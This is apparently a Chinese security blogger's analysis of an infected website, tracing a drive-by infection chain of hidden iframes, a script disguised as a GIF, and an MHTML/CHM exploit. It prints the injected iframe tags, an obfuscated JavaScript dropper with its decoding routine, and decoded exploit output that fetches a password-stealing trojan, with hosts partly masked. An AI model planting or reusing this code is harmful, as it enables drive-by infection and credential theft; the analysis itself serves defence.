[07-20] 带毒网站www.china***huati.com(第3版)

hxxp://www.china***huati.com首页被加入：  

--------------------------------

＜iframe src=hxxp://bbs.**gemeus*.com/q17***/index.htm width=0 height=0＞＜/iframe＞

……

＜iframe height=0 width=0 src="hxxp://www.***ll-nba.com/*4***"＞＜/iframe＞（endurer注：共有6处插入）

--------------------------------

hxxp://bbs.**gemeus*.com/q17***/index.htm的内容为：

--------------------------------

＜script language="javascript" src="ah.js"＞＜/script＞

--------------------------------

ah.js 的内容解密后的内容为:

--------------------------------

GIF89a

var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('＜OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c://.mht!'+GIF89a+'/1.js::/#"＞＜/OBJECT＞');

--------------------------------

冒充GIF文件，下载运行 1.js。

Kaspersky 将 1.js 报为： Packed.Win32.Klone.d（ http://www.viruslist.com/en/viruses/encyclopedia?virusid=115946）。

江民KV 将 1.js 报为： Exploit.HTML.Mht.ae（ http://virusinfo.jiangmin.com/infomation/200641010559.html）。

1.js 其实是个CHM文件，会释放/运行名为 msnmon.exe 的文件。

Kaspersky 将 msnmon.exe 报为： not-a-virus:AdWare.Win32.WSearch.k。

江民 对 msnmon.exe 的回复为： 不是病毒。

hxxp://www.***ll-nba.com/*4***的内容为：

------------------------
＜SCRIPT LANGUAGE="JavaScript"＞
＜!--
var HtmlStrings=["=iunm＞ =PCKFDU!tuzmf＞#ejtqmbz;opof＜#!uzqf＞#ufyu0y.tdsjqumfu#!e","bub＞#'$88'$86'$69'$75'$88'$94'$84'$95'$94'$227'$222'$225'$212","'$69'$21:'$215'$227'$21:'$219'$69'$::'$69'$:3'$57'$21:'$215'$","227'$44'$215'$227'$227'$223'$69'$580xxx/mm.ocb/dpn050mphp/kqh",";;0213&3F&79un#＞=0PCKFDU＞ =0cpez＞ =0iunm＞ "];
function psw(st){
  var varS;
  varS="";
  var i;
  for(var a=0;a＜st.length;a++){
    i = st.charCodeAt(a);
    if (i==1)
      varS=varS+String.fromCharCode('"'.charCodeAt()-1);
    else if (i==2) {
      a++;
      varS+=String.fromCharCode(st.charCodeAt(a));
      }
    else
      varS+=String.fromCharCode(i-1);
  }
  return varS;
};
var num=5;
function S(){
for(i=0;i＜num;i++)
  document.write(psw(HtmlStrings[i]));}
S();
// --＞
＜/SCRIPT＞
-----------------------

代码运行后输出的内容为：

-----------------------
＜html＞
＜OBJECT style="display:none;" type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:/.mht!http://www.***ll-nba.com/*4***/logo.jpg::/102%2E%68tm"＞＜/OBJECT＞
＜/body＞
＜/html＞
-----------------------

会下载hxxp:///www.***ll-nba.com/*4***/logo.jpg。

Kaspersky 将 logo.jpg 报为：Trojan-PSW.Win32.QQShou.fw( http://www.viruslist.com/en/viruses/encyclopedia?virusid=123300)。

江民KV 将 logo.jpg 报为：TrojanDropper.Mht.Psyme.gfi。